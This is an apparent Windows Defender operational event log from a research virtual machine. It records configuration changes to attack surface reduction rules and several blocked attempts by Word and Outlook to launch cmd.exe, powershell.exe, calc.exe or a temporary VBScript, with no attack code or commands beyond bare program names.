Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x2
11/16/2023 04:22:28 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1818
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x2
11/16/2023 04:22:28 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1817
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x2
11/16/2023 04:22:28 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1816
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x2
11/16/2023 04:22:28 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1815
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x2
11/16/2023 04:22:28 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1814
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x2
11/16/2023 04:22:28 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1813
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x2
11/16/2023 04:22:28 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1812
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x2
11/16/2023 03:51:28 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=1811
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: 3B576869-A4EC-4529-8536-B80A7769E899
Detection time: 2023-11-16T15:51:28.553Z
User: researchvmhaa\research
Path: C:\Users\research\AppData\Local\Temp\script.vbs
Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Target Commandline:
Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.696.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/16/2023 03:49:14 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=1810
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Detection time: 2023-11-16T15:49:14.419Z
User: researchvmhaa\research
Path: C:\Windows\System32\cmd.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Target Commandline: cmd.exe
Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.696.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/16/2023 03:48:55 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=1809
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Detection time: 2023-11-16T15:48:55.840Z
User: researchvmhaa\research
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Target Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.696.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/16/2023 03:48:43 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=1808
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Detection time: 2023-11-16T15:48:43.137Z
User: researchvmhaa\research
Path: C:\Windows\System32\cmd.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Target Commandline: "C:\Windows\System32\cmd.exe"
Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.696.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/16/2023 03:48:05 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=1807
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: 26190899-1602-49E8-8B27-EB1D0A1CE869
Detection time: 2023-11-16T15:48:05.496Z
User: researchvmhaa\research
Path: C:\Windows\System32\cmd.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
Target Commandline: "C:\Windows\System32\cmd.exe"
Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" -Embedding
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.696.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/16/2023 03:47:26 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=1806
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: 26190899-1602-49E8-8B27-EB1D0A1CE869
Detection time: 2023-11-16T15:47:26.565Z
User: researchvmhaa\research
Path: C:\Windows\System32\calc.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
Target Commandline: "C:\Windows\System32\calc.exe"
Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" -Embedding
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.696.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/16/2023 03:46:44 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=1805
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Detection time: 2023-11-16T15:46:44.558Z
User: researchvmhaa\research
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Target Commandline: powershell.exe
Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.696.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/16/2023 03:29:16 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=1804
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: 9E6C4E1F-7D60-472F-BA1A-A39EF669E4B2
Detection time: 2023-11-16T15:29:16.906Z
User: NT AUTHORITY\SYSTEM
Path: C:\WindowsAzure\Packages\WaAppAgent.exe
Process Name: C:\Windows\System32\lsass.exe
Target Commandline:
Parent Commandline:
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.696.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/16/2023 03:29:07 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1803
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\ServiceStartStates = 0x1
New value: Default\ServiceStartStates = 0x0
11/16/2023 03:29:03 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1802
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\ServiceStartStates = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\ServiceStartStates = 0x1
11/16/2023 03:28:51 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1801
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\IsServiceRunning = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\IsServiceRunning = 0x1
11/16/2023 02:57:57 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=1800
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Detection time: 2023-11-16T14:57:57.040Z
User: researchvmhaa\research
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Target Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.696.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/16/2023 12:54:53 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1744
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1
11/16/2023 12:44:53 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=1741
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: 9E6C4E1F-7D60-472F-BA1A-A39EF669E4B2
Detection time: 2023-11-16T12:44:53.365Z
User: NT AUTHORITY\SYSTEM
Path: C:\WindowsAzure\Packages\WaAppAgent.exe
Process Name: C:\Windows\System32\lsass.exe
Target Commandline:
Parent Commandline:
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.693.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/16/2023 12:44:37 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1740
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\ServiceStartStates = 0x1
New value: Default\ServiceStartStates = 0x0
11/16/2023 12:44:33 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1739
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\ServiceStartStates = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\ServiceStartStates = 0x1
11/16/2023 12:44:22 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1738
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\IsServiceRunning = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\IsServiceRunning = 0x1
11/16/2023 03:33:56 AM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1632
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1
New value:
11/16/2023 01:50:39 AM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1609
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1
11/15/2023 07:23:27 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1576
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\ProductAppDataPath = C:\ProgramData\Microsoft\Windows Defender
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\ProductAppDataPath = C:\ProgramData\Microsoft\Windows Defender
11/15/2023 01:50:39 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1492
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1
New value:
11/15/2023 09:50:24 AM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1474
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\Signature Updates\ISUControlFlags = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates\ISUControlFlags = 0x1
11/15/2023 09:50:24 AM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1473
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\Signature Updates\ISUInterval = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates\ISUInterval = 0x4
11/15/2023 09:50:24 AM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1472
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\Signature Updates\ISUReason = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates\ISUReason = 0x10
11/15/2023 09:50:24 AM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1471
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\Signature Updates\ISULength = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates\ISULength = 0x18
11/15/2023 09:49:29 AM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1321
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1
11/15/2023 03:24:34 AM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=1306
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: 9E6C4E1F-7D60-472F-BA1A-A39EF669E4B2
Detection time: 2023-11-15T03:24:34.279Z
User: NT AUTHORITY\SYSTEM
Path: C:\WindowsAzure\Packages\WaAppAgent.exe
Process Name: C:\Windows\System32\lsass.exe
Target Commandline:
Parent Commandline:
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.622.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/15/2023 03:23:41 AM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1305
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\ServiceStartStates = 0x1
New value: Default\ServiceStartStates = 0x0
11/15/2023 03:23:33 AM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1304
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\ServiceStartStates = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\ServiceStartStates = 0x1
11/15/2023 03:23:23 AM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=1303
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\IsServiceRunning = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\IsServiceRunning = 0x1
11/14/2023 11:12:42 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=1294
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: 9E6C4E1F-7D60-472F-BA1A-A39EF669E4B2
Detection time: 2023-11-14T23:12:42.900Z
User: NT AUTHORITY\SYSTEM
Path: C:\WindowsAzure\Packages\WaAppAgent.exe
Process Name: C:\Windows\System32\lsass.exe
Target Commandline: C:\WindowsAzure\Packages\WaAppAgent.exe
Parent Commandline:
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.622.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/14/2023 10:52:44 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=598
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\Diagnostics\LastSignatureUpdateResult = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Diagnostics\LastSignatureUpdateResult = 0x0
11/14/2023 10:52:44 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=597
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\CoreService\MemorySensor\LowThresholds = 2|
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\MemorySensor\LowThresholds = 4|1024|128
11/14/2023 10:52:44 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=596
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\CoreService\MemorySensor\MonitoredTargets = msmpeng|
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\MemorySensor\MonitoredTargets = mpdefendercoreservice|msmpeng|nissrv
11/14/2023 10:52:44 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=595
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\CoreService\MemorySensor\HighThresholds = 1024|
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\MemorySensor\HighThresholds = 16|2048|1024
